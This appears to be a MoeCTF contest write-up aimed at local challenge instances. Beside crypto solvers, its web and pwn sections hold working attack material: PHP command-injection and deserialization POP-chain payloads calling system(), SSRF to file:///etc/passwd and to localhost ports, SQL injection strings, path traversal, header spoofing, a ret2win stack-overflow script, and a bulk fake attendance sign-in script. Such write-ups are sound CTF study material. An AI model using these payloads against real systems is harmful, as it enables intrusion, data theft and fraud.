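    return -1 if r == prime - 1 else r


# The original called a `legendre_symbol` that this snippet neither defines
# nor imports (presumably Sage's) and wrote the quotients as `c/a`, which is
# float division in plain Python. Both are replaced by integer arithmetic
# modulo p: the inverse comes from Fermat's little theorem.
inv_a = pow(a, p - 2, p)
inv_a1 = pow(a + 1, p - 2, p)

flag = []
for c in n:
    # Decide whether a solution exists: c/a being a quadratic residue mod p
    # marks the bit as 0.
    if _legendre(c * inv_a, p) == 1:
        flag.append(0)
        continue
    # Otherwise c/(a+1) being a quadratic residue marks the bit as 1.
    if _legendre(c * inv_a1, p) == 1:
        flag.append(1)
        continue
    # Neither test succeeded. As in the original, no bit is appended, so any
    # later bits shift by one position.
    print("The result is indeterminate.")
print(''.join(str(i) for i in flag))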
moectf{minus_one_1s_n0t_qu4dr4tic_r4sidu4_when_p_mod_f0ur_equ41_to_thr33}
RSA_revenge
参考链接 ASIS 2015 总决赛:RSASR (crypto300) – /var/log/security/kt.log
def Brute_force(a, b, k):
    """Search for two 512-bit factors of the global `n` that mirror each other.

    At depth k the candidates receive bit (511 - k) and bit k together: bit
    (511 - k) of `a` equals bit k of `b` and the reverse, so `b` is always the
    512-bit reversal of `a`. Branches are pruned when the partial product is
    already above n, when even the largest completion stays below n, or when
    the low k+1 bits of the product disagree with n.

    Prints the pair and waits for Enter when a*b == n at depth 256.
    Always returns 0.
    """
    if k == 256:
        if a * b == n:
            print(a, b)
            input()
        return 0

    high = 2 ** (511 - k)   # weight of the bit fixed from the top
    low = 2 ** k            # weight of the bit fixed from the bottom
    modulus = 2 ** (k + 1)  # compares the low k+1 bits

    for i in (0, 1):
        for j in (0, 1):
            a1 = a + i * high + j * low
            b1 = b + j * high + i * low
            prod = a1 * b1
            overshoots = prod > n
            if overshoots or (a1 + high) * (b1 + high) < n:
                continue
            if prod % modulus == n % modulus:
                Brute_force(a1, b1, k + 1)
    return 0


Brute_force(0, 0, 0)
new_system
moectf{gift_1s_present}
先看lcg公式求b,再化简取模,模逆
import gmpy2
from Crypto.Util.number import long_to_bytes
# Three (a_i, c_i) samples and the modulus q taken from the challenge output.
a1 = 48152794364522745851371693618734308982941622286593286738834529420565211572487
c1 = 21052760152946883017126800753094180159601684210961525956716021776156447417961
a2 = 48649737427609115586886970515713274413023152700099032993736004585718157300141
c2 = 6060718815088072976566240336428486321776540407635735983986746493811330309844
a3 = 30099883325957937700435284907440664781247503171217717818782838808179889651361
c3 = 85333708281128255260940125642017184300901184334842582132090488518099650581761
q = 105482865285555225519947662900872028851795846950902311343782163147659668129411

# Each sample is treated as c_i = a_i * x + gift_i (mod q), with the third
# gift being the sum of the first two. Combining the three relations leaves
#     (a1 + a2 - a3) * x = c1 + c2 - c3  (mod q),
# which needs the coefficient of x to be invertible modulo q.
denominator = (a2 - a3 + a1) % q  # reduced into [0, q) before the zero test
if denominator != 0:
    numerator = c2 - c3 + c1
    x = gmpy2.invert(denominator, q) * numerator % q
    print(f"找到的秘密密钥 x: {x:d}")

    # Recover the three gifts from x and check that they are consistent.
    gift1 = (c1 - a1 * x) % q
    gift2 = (c2 - a2 * x) % q
    gift = (c3 - a3 * x) % q
    if gift == (gift1 + gift2) % q:
        print('success x', x)
        print('success gift1', gift1)
        print('success gift2', gift2)
        print('success gift', gift)
        print(long_to_bytes(gift))
else:
    # The coefficient of x vanished modulo q, so x cannot be isolated.
    print("无法直接解出 x,因为分母为零。")
WEB
Web渗透测试与审计入门指北
moectf{H3r3'5_@_flYinG_kIss_f0r_yoU!}
运行源码
弗拉格之地的入口
http://127.0.0.1:2784/robots.txt
弗拉格之地的挑战
按提示闯关
POST /flag7fxxkfinal.php?a=2&moe=Flag HTTP/1.1
Host: 127.0.0.1:6927
sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
referer: http://localhost:8080/flag3cad.php?a=1
Cookie: verify=admin; PHPSESSID=8d5643dbf3b034504b084eb45740b2b2; session=eyJjb2luIjpbMl0sImNvaW5fY291bnQiOjEsInBsYXllciI6ImQiLCJyb3VuZCI6LTEsInRpbWUiOjE3MjQwNDQ2MzMuMDIyNzEyfQ.ZsLVXg.7jD-C1iXRqEOkSkx-uSRx39LWgc; retainlogin=1; token=ad234ea9-bbc1-416d-b2f5-2bb3afb86e38; __wzd5cc1c8e9ac487aaec440=1724385077|00730c0a3b30
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 80
b=1&method=get&content=I%20want%20flag&moe=Flag&what=system('cat%20%2fflag7')%3b
ImageCloud前置
http://127.0.0.1:10441/index.php?url=file%3A%2F%2F%2Fetc%2Fpasswd
电院_Backend
d@d.cn' union select 1,2,3 #
pop moe
<?php
// Builds a nested object graph, serializes it and prints the result
// URL-encoded.
// The four classes are empty stand-ins. Only their names and the property
// names and values assigned below end up in the serialized string.
// NOTE(review): presumably the output is fed to unserialize() on the
// challenge side. Object injection like this is possible only where
// unserialize() receives user-controlled input; restricting it with the
// allowed_classes option or switching to a data-only format such as JSON
// removes that surface.
class class000 {}
class class001 {}
class class002 {}
class class003 {}
$c0 = new class000();
$c0->payl0ad=1;
// If the target class declares $what as protected, the serialized property
// name carries a \00*\00 prefix (%00%2A%00 once URL-encoded), so the declared
// name length becomes 4+3.
$c0->what = new class001();
$c0->what->payl0ad = 'dangerous';
$c0->what->a = new class002();
$c0->what->a->sec = new class003();
// The innermost property holds a string of PHP code. Here it only dumps the
// environment.
$c0->what->a->sec->mystr='system(\'env\');';
// Statement order above fixes the property order in the serialized output.
echo urlencode(serialize($c0));
勇闯铜人阵
每次回答时cookie会变,服务端会校验
from time import sleep
import requests
from urllib.parse import quote
# 截取某字符串之后的字符串
def get_str(str, start, end):
    """Return the text of *str* between the first *start* and the next *end*.

    The search for *end* begins right after *start*. An empty string is
    returned when either marker is missing.
    """
    marker_at = str.find(start)
    if marker_at < 0:
        return ""
    begin = marker_at + len(start)
    stop = str.find(end, begin)
    return "" if stop < 0 else str[begin:stop]
# Cookie jar shared by every request helper in this script. mingbai() and
# post_ans() add or replace its 'session' entry after each reply, because the
# server issues a new session cookie per answer.
burp0_cookies = dict(
    verify="admin",
    PHPSESSID="8d5643dbf3b034504b084eb45740b2b2",
)
# No extra request headers are sent.
burp0_headers = dict()
def start():
    """Request the /restart endpoint and return the response body as text."""
    reply = requests.get(
        "http://127.0.0.1:4869/restart?",
        headers=burp0_headers,
        cookies=burp0_cookies,
    )
    return reply.text
def mingbai():
    """Post the fixed acknowledgement and return the response body.

    The 'session' cookie set by the reply is printed and stored in the shared
    `burp0_cookies` dict so the next request carries it.
    """
    form = {"player": "d", "direct": "弟子明白"}
    reply = requests.post(
        "http://127.0.0.1:4869/",
        headers=burp0_headers,
        cookies=burp0_cookies,
        data=form,
    )
    # Cookie handed back by this POST; raises KeyError if the server set none.
    fresh_session = reply.cookies['session']
    print(fresh_session)
    # Update the shared cookie dict for the following request.
    burp0_cookies['session'] = fresh_session
    return reply.text
def answer(t1):
    """Translate a status line of direction numbers into the expected reply.

    *t1* holds one or two comma-separated digits from 1 to 8. The reply is
    posted with post_ans() and the function calls itself on the next status
    line, so the chain continues until a status line is not a known digit
    (KeyError) or a request fails. Returns the reply built for this round.
    """
    # Strip spaces and line breaks, then split on commas.
    t2 = t1.replace(" ", "").replace("\n", "").split(",")
    print(t2)
    # Direction lookup table for the challenge.
    tz = {
        "1": "北方",
        "2": "东北方",
        "3": "东方",
        "4": "东南方",
        "5": "南方",
        "6": "西南方",
        "7": "西方",
        "8": "西北方",
    }
    first = tz[t2[0]]
    if len(t2) == 1:
        flag = first
    else:
        flag = first + '一个,' + tz[t2[1]] + '一个'
    print(flag)
    # Submit this round's reply and continue with the status it returns.
    answer(post_ans(flag))
    return flag
def post_ans(ans):
    """Post *ans* as the player's reply and return the next status text.

    Waits half a second first. The 'session' cookie from the reply replaces
    the one in the shared `burp0_cookies` dict; if the reply carries none,
    the response body is printed and the KeyError from the update propagates.
    """
    sleep(0.5)
    endpoint = "http://127.0.0.1:4869/"
    # URL-encoded form of the answer; computed as in the original but unused,
    # since requests encodes the form data itself.
    url_encoded_string = quote(ans)
    form = {"player": "d", "direct": ans}
    reply = requests.post(endpoint, headers=burp0_headers, cookies=burp0_cookies, data=form)
    # Show the cookie returned by this POST, or the body if there is none.
    try:
        print(reply.cookies['session'])
    except Exception as e:
        print(e)
        print(reply.text)
    # Update the shared cookie dict for the next request.
    burp0_cookies['session'] = reply.cookies['session']
    print(form)
    status = get_str(reply.text, "id=\"status\">", "</h1>")
    print(status)
    return status
# Restart the game and show the initial status line.
opening_page = start()
print(get_str(opening_page, "id=\"status\">", "</h1>"))
# Acknowledge the rules, then answer the first status line; answer() keeps
# going from there.
first_page = mingbai()
t1 = get_str(first_page, "id=\"status\">", "</h1>")
answer(t1)
Re: 从零开始的 XDU 教书生活
获取学生字典-->学生账号AES加密-->获取token-->获取二维码参数-->批量签到
from time import sleep
import requests
import json
from tqdm import tqdm
# Intended to raise the retry count so dropped connections are retried.
# NOTE(review): HTTPAdapter appears to bind this default when the class is
# defined, so assigning it here may have no effect — confirm, or mount an
# HTTPAdapter(max_retries=5) on the session instead.
requests.adapters.DEFAULT_RETRIES = 5
session = requests.Session()
# NOTE(review): presumably meant to disable keep-alive; it is the
# "Connection: close" header below that asks for that — confirm.
session.keep_alive = False

# Cookies captured from a browser session against the local instance.
burp0_cookies = {
    "verify": "user",
    "PHPSESSID": "8d5643dbf3b034504b084eb45740b2b2",
    "session": "eyJjb2luIjpbMl0sImNvaW5fY291bnQiOjEsInBsYXllciI6ImQiLCJyb3VuZCI6LTEsInRpbWUiOjE3MjQwNDQ2MzMuMDIyNzEyfQ.ZsLVXg.7jD-C1iXRqEOkSkx-uSRx39LWgc",
    "retainlogin": "1",
    "token": "024816c9-d1f5-4ad4-96e0-e7f589e1dc34",
}

# Browser-like request headers sent with every call.
burp0_headers = {
    "sec-ch-ua": "\"Chromium\";v=\"113\", \"Not-A.Brand\";v=\"24\"",
    "Accept": "application/json, text/javascript, */*; q=0.01",
    "X-Requested-With": "XMLHttpRequest",
    "sec-ch-ua-mobile": "?0",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36",
    "sec-ch-ua-platform": "\"Windows\"",
    "Sec-Fetch-Site": "same-origin",
    "Sec-Fetch-Mode": "cors",
    "Sec-Fetch-Dest": "empty",
    "Referer": "http://127.0.0.1:10156/widget/sign/pcTeaSignController/showSignInfo",
    "Accept-Encoding": "gzip, deflate",
    "Accept-Language": "zh-CN,zh;q=0.9",
    "Connection": "close",
}
def get_names():
    """Fetch the sign-in info and return the ``name`` of every unsigned entry.

    Reads ``data.changeUnSignList`` from the JSON response, prints how many
    names were found and returns them as a list.
    """
    burp0_url = "http://127.0.0.1:10156/widget/sign/pcTeaSignController/showSignInfo1?activeId=4000000000000&webCacheId=4000000000000&appType=15&_=1724048261701"
    res = session.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies)
    payload = json.loads(res.text)
    # Keep only the 'name' column of the list.
    names = [entry['name'] for entry in payload['data']['changeUnSignList']]
    print(len(names))
    return names
# AES加密一个文本
#
# # str不是16的倍数那就补足为16的倍数
# def add_to_16(value):
# while len(value) % 16 != 0:
# value += '\0'
# return str.encode(value) # 返回bytes
# 加密方法
# coding: utf-8
import base64
import binascii
from Crypto.Cipher import AES
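class AESUtil:
    """AES helper for ECB and CBC with zero or PKCS#7-style padding.

    Every ``encrypt``/``decrypt`` call rebuilds the cipher from its arguments,
    so one instance can be reused with different keys and modes.

    Review notes:
    * ECB maps equal plaintext blocks to equal ciphertext blocks.
    * Zero padding cannot be told apart from trailing NUL bytes in the data.
    """

    # State filled in by init_aes(); None until the first encrypt/decrypt.
    encode_ = None
    model = None
    iv = None
    key = None
    aes = None

    def init(self, key, model, iv, encode_='utf-8'):
        """Clear the cached cipher; the arguments are not used.

        This is a plain method named ``init``, not the constructor.
        """
        self.aes = None

    # The key length must be 16, 24 or 32 bytes; 16 is enough for now.
    def init_aes(self, encode_, model, iv, key):
        """Store the settings and create the cipher object.

        ``model`` must be ``'ECB'`` or ``'CBC'`` (anything else raises
        ``KeyError``). The key is NUL-padded to a multiple of 16 bytes.
        """
        self.encode_ = encode_
        self.model = model
        self.iv = iv.encode()
        self.key = self.add_16(key)
        self.BLOCK_SIZE_16 = AES.block_size
        model_func = {'ECB': AES.MODE_ECB, 'CBC': AES.MODE_CBC}[self.model]
        if self.model == 'ECB':
            self.aes = AES.new(self.key, model_func)
        elif self.model == 'CBC':
            self.aes = AES.new(self.key, model_func, self.iv)

    def add_16(self, par):
        """Encode ``par`` and append NUL bytes up to a multiple of 16 bytes."""
        par = par.encode(self.encode_)
        while len(par) % 16 != 0:
            par += b'\x00'
        return par

    def pkcs7padding(self, text):
        """Append PKCS#7-style padding characters to the string ``text``.

        The pad length is computed from the encoded byte length rather than
        the character count, so text with multi-byte characters still ends on
        a block boundary once encoded. For ASCII text the result is the same
        as before. A full block is added when the input is already aligned.
        """
        block = self.BLOCK_SIZE_16
        pad_len = block - (len(text.encode(self.encode_)) % block)
        # chr(pad_len) is a single byte in ASCII-compatible encodings.
        return text + chr(pad_len) * pad_len

    def encrypt(self, text, key, model, iv='', encode_='utf-8', out_type="base64", padding="zero0"):
        """Encrypt ``text`` and return the ciphertext as text.

        ``padding="pkcs7"`` applies ``pkcs7padding`` first; any other value
        leaves only the NUL fill done by ``add_16``. The result is base64
        unless ``out_type`` is ``"hex"``.
        """
        self.init_aes(encode_, model, iv, key)
        if padding == "pkcs7":
            text = self.pkcs7padding(text)
        text = self.add_16(text)
        buff = self.aes.encrypt(text)
        if out_type == "hex":
            return str(binascii.hexlify(buff), encoding='utf-8')
        return base64.encodebytes(buff).decode().strip()

    def decrypt(self, text, key, model, iv='', encode_='utf-8'):
        """Decrypt base64 ``text`` and return the plaintext string.

        The ``encode_`` argument is used for the input as well; the original
        read ``self.encode_`` before ``init_aes`` had set it, which is
        ``None`` on a fresh instance.
        """
        text = base64.decodebytes(text.encode(encode_))
        self.init_aes(encode_, model, iv, key)
        plain = self.aes.decrypt(text).decode(self.encode_)
        # NOTE(review): only NULs and the pad bytes 0x05-0x07 are removed, so
        # PKCS#7 padding of any other length stays in the result.
        return plain.strip('\0').replace("\x05", '').replace("\x06", '').replace(
            "\x07", '')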
def login(pwd):
    """Log in with ``pwd`` as both user name and password and keep the token.

    POSTs the login form to ``/fanyalogin`` through the shared session and
    copies the ``token`` cookie of the response into ``burp0_cookies``.
    Raises ``KeyError`` when the response sets no ``token`` cookie.
    """
    import requests  # kept from the original; not used in this function

    form = {
        "fid": "-1",
        "uname": pwd,
        "password": pwd,
        "refer": "https%3A%2F%2Fi.chaoxing.com",
        "t": "true",
        "forbidotherlogin": "0",
        "validate": '',
        "doubleFactorLogin": "0",
        "independentId": "0",
        "independentNameId": "0",
    }
    response = session.post(
        "http://127.0.0.1:10156/fanyalogin",
        headers=burp0_headers,
        cookies=burp0_cookies,
        data=form,
    )
    burp0_cookies['token'] = response.cookies['token']
# F9RbghmuxtrFEC7gxyLzkQ
def getQR():
    """Request a fresh QR code and return the ``data`` member of the JSON reply.

    The whole decoded reply is printed before returning.
    """
    response = session.get(
        "http://127.0.0.1:10156/v2/apis/sign/refreshQRCode?activeId=4000000000000&time=&viewFrom=&viceScreen=0&viceScreenEwmEnc=",
        headers=burp0_headers,
        cookies=burp0_cookies,
    )
    reply = json.loads(response.text)
    print(reply)
    return reply['data']
def sign(json_res):
    """Call the sign-in URL built from ``json_res['signCode']`` and ``json_res['enc']``.

    Both values are concatenated into the query string as they are, without
    URL-encoding. Nothing is returned.
    """
    burp0_url = "".join([
        "http://127.0.0.1:10156/widget/sign/e?id=4000000000000&c=",
        json_res['signCode'],
        "&enc=",
        json_res['enc'],
        "&DB_STRATEGY=PRIMARY_KEY&STRATEGY_PARA=id",
    ])
    res = session.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies)
    # NOTE(review): the listing lost its indentation; close() is read as the
    # last statement of this function — confirm against the original file.
    session.close()
if __name__ == '__main__':
    # The same 16-character string is passed as the AES key and as the CBC IV.
    shared_secret = "u2oh6Vu^HWe4_AES"
    for stu in tqdm(get_names()):
        aes = AESUtil()
        # Each name is encrypted and the result is used as the login value.
        _text = aes.encrypt(stu, shared_secret, "CBC", shared_secret, padding="pkcs7")
        login(_text)
        # Fetch the current QR parameters and sign in under this login.
        sign(getQR())
ImageCloud
import requests
# Each request asks the /image endpoint to fetch a URL on localhost, one
# port at a time, and stops at the first reply that contains a JPEG marker.
# NOTE(review): this presumably works because the endpoint fetches the
# supplied URL on the server side without restricting loopback
# destinations; an allow-list of fetch targets would close it — confirm.
for port in range(5280, 6000):
    url = f'http://127.0.0.1:50319/image?url=http://localhost:{port}/image/flag.jpg'
    body = requests.get(url).text
    print(f'{port=}, {body}')
    if 'JFIF' not in body:
        continue
    exit(0)
moectf{cETtEbRat3-yOU_4Tt4ck-to_My_Tm@G3-ct0udHHHhHH140}
ez_http
POST /?xt=%E5%A4%A7%E5%B8%85b HTTP/1.1
Host: 127.0.0.1:14304
sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: MoeDedicatedBrowser
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Referer: https://www.xidian.edu.cn/
cookie: user=admin
X-Forwarded-For:127.0.0.1
X-Forwarded:127.0.0.1
Forwarded-For:127.0.0.1
Forwarded:127.0.0.1
X-Forwarded-Host:127.0.0.1
X-remote-IP:127.0.0.1
X-remote-addr:127.0.0.1
True-Client-IP:127.0.0.1
X-Client-IP:127.0.0.1
Client-IP:127.0.0.1
X-Real-IP:127.0.0.1
Ali-CDN-Real-IP:127.0.0.1
Cdn-Src-Ip:127.0.0.1
Cdn-Real-Ip:127.0.0.1
CF-Connecting-IP:127.0.0.1
X-Cluster-Client-IP:127.0.0.1
WL-Proxy-Client-IP:127.0.0.1
Proxy-Client-IP:127.0.0.1
Fastly-Client-Ip:127.0.0.1
True-Client-Ip:127.0.0.1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 8
imoau=sb
ProveYourLove
发包300次
POST /questionnaire HTTP/1.1
Host: 127.0.0.1:5687
Content-Length: 107
sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"
sec-ch-ua-platform: "Windows"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Content-Type: application/json
Accept: */*
Origin: http://127.0.0.1:5687
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:5687/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: verify=user; PHPSESSID=8d5643dbf3b034504b084eb45740b2b2; session=eyJjb2luIjpbMl0sImNvaW5fY291bnQiOjEsInBsYXllciI6ImQiLCJyb3VuZCI6LTEsInRpbWUiOjE3MjQwNDQ2MzMuMDIyNzEyfQ.ZsLVXg.7jD-C1iXRqEOkSkx-uSRx39LWgc; retainlogin=1; token=ad234ea9-bbc1-416d-b2f5-2bb3afb86e38; __wzd5cc1c8e9ac487aaec440=1724385077|00730c0a3b30
Connection: close
{"nickname":"1","user_gender":"male","target":"1","target_gender":"male","message":"§1§","anonymous":"false"}
flag: moectf{CoNgrAtULAtlOn5_ON-bEC0MING_A_1ICK1NG_dOG77}
Qixi_flag: moeCTF{Happy_Chin3s3_Va13ntin3's_Day,_Baby.}
静态网页
POST /final1l1l_challenge.php?a=a HTTP/1.1
Host: 127.0.0.1:12982
sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: verify=user; PHPSESSID=8d5643dbf3b034504b084eb45740b2b2; session=eyJjb2luIjpbMl0sImNvaW5fY291bnQiOjEsInBsYXllciI6ImQiLCJyb3VuZCI6LTEsInRpbWUiOjE3MjQwNDQ2MzMuMDIyNzEyfQ.ZsLVXg.7jD-C1iXRqEOkSkx-uSRx39LWgc; retainlogin=1; token=ad234ea9-bbc1-416d-b2f5-2bb3afb86e38; __wzd5cc1c8e9ac487aaec440=1724385077|00730c0a3b30; __wzd30287248c4b7b7137545=1724401549|03b8e06b5b8f
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 37
b[a]=0cc175b9c0f1b6a831c399e269772661
垫刀之路01: MoeCTF?启动!
env
垫刀之路02: 普通的文件上传
as=system('env')%3b
垫刀之路03图床
as=system('env')%3b
垫刀之路05: 登陆网站
admin123' #
垫刀之路04: 一个文件浏览器
http://127.0.0.1:1338/?path=/src/../../../../../../../../../../../../tmp/flag
垫刀之路06: pop base mini moe
<?php
/**
 * Calls the value stored in $a as a function when the object is destroyed.
 *
 * __destruct() runs automatically, so an object of this class rebuilt by
 * unserialize() makes that call with whatever property values the
 * serialized data supplies. Not passing untrusted data to unserialize()
 * (or using its allowed_classes option) keeps such a class from being
 * instantiated that way.
 */
class A {
    // Note how private properties are serialized
    private $evil='env';
    // How can it be assigned?
    public $a; # private (presumably private in the target class; public here so it can be set - confirm)
    // Runs on destruction: invokes $this->a with $this->evil as its argument.
    function __destruct() {
        $s = $this->a;
        $s($this->evil);
    }
}
/**
 * Callable object: invoking an instance calls the function named in $b
 * with the argument it was given.
 */
class B {
    private $b='system';
    // Prints the argument and the function name, then calls $this->b($c).
    function __invoke($c) {
        echo("\n");
        echo $c;
        echo("\n");
        echo("\n");
        echo $this->b;
        echo("\n");
        $s = $this->b;
        $s($c);
    }
}
// Build the object graph: an A whose $a property holds a B instance.
$s = new A();
$s->a=new B();
$data = serialize($s);
echo("\n");
// Raw serialized form; private property names contain NUL bytes that do not print.
echo $data;
echo("\n");
// URL-encoded form, in which those NUL bytes appear as %00.
echo urlencode($data);
echo("\n");
// Round-trip locally: destroying the rebuilt object runs A::__destruct().
unserialize($data);
垫刀之路07: 泄漏的密码
import os
# Runs `cat flag` through a shell and returns what it printed; as a bare
# expression the value is only displayed by an interactive console.
os.popen("cat flag").read()
PWN
二进制漏洞审计入门指北
nc ip:port
moectf{Welcome_to_the_journey_of_Pwn}
nomoreno_more_gets
栈溢出
from pwn import *
# Local copy of the challenge binary; its architecture is read from it below.
binary = './lockedshell'
# Filler sizes: 80 + 8 = 88 bytes are written before the first address.
# presumably 80 bytes of buffer plus the 8-byte saved frame pointer — TODO confirm against the binary
padding = 80
pad = 8
elf = ELF(binary)
context(log_level='debug', arch=elf.arch, os='linux', binary=binary)
s = remote('127.0.0.1', 45073)
# Address of a bare `ret` instruction found in the binary.
# presumably inserted to keep the stack 16-byte aligned — TODO confirm
ret = ROP(elf).find_gadget(['ret'])[0]
# Payload layout: filler, the `ret` gadget, then the hard-coded address 0x401176.
# NOTE(review): a hard-coded address only works for a binary loaded at a fixed
# base (no PIE), and a stack canary would stop this overwrite — verify the
# binary's protections with checksec.
p = flat(b'a' * (padding + pad), ret, 0x000401176)
s.sendline(p)
s.interactive()
Week1
re
tea
# 如果超过8字节 2个一组处理
from Crypto.Util.number import long_to_bytes
def decrypt(v, k):
    """Decrypt one 64-bit TEA block.

    ``v`` holds the two 32-bit halves of the block and ``k`` the four 32-bit
    key words. Runs 32 rounds in reverse, starting from ``delta * 32``, and
    returns the two plaintext halves as ``[v0, v1]``.
    """
    mask = 0xFFFFFFFF
    delta = 0x9E3779B9
    left, right = v
    key0, key1, key2, key3 = k
    # Round sum after 32 encryption rounds, reduced to 32 bits.
    round_sum = (delta * 32) & mask
    for _ in range(32):
        # Undo the second half-round first, then the first one.
        right = (right - (((left << 4) + key2) ^ (left + round_sum) ^ ((left >> 5) + key3))) & mask
        left = (left - (((right << 4) + key0) ^ (right + round_sum) ^ ((right >> 5) + key1))) & mask
        round_sum = (round_sum - delta) & mask
    return [left, right]
if __name__ == '__main__':
    import struct

    # Key words and the two ciphertext halves of the single block.
    key = [0x65736162, 0x6F783436, 0x61657472, 0x61657478]
    values = [676078132, 957400408]
    v = decrypt(values, key)
    # Print each decrypted half as hex, first half first.
    for half in (v[0], v[1]):
        print(long_to_bytes(half).hex())
# 提交的是16进制
# moectf{836153a5-8e00-49bd-9c42-caf30620caaf}
运维题
echo "$(</flag.txt)"
# https://www.busybox.net/downloads/binaries/1.35.0-x86_64-linux-musl/
# Download the static wget, httpd and chmod binaries
# Write the binary out from its hex bytes
# On the neighbouring host: serve libc for download
./busybox_HTTPD -p 8080 -h ./
# On the damaged host
printf '\x7F\x45\x4C\x46\x02...'> chmod
...
wget http://127.0.0.1:8080/ld-linux-x86-64.so.2
wget http://127.0.0.1:8080/x86_64-linux-gnu/libc.so.6
# NOTE(review): mode 777 leaves the C library and the dynamic loader writable
# by every user; 755 is enough for them to be loaded.
chmod 777 /lib/x86_64-linux-gnu/libc.so.6
chmod 777 /lib/x86_64-linux-gnu/ld-linux-x86-64.so.2
service nginx start
cat /var/log/nginx/access.log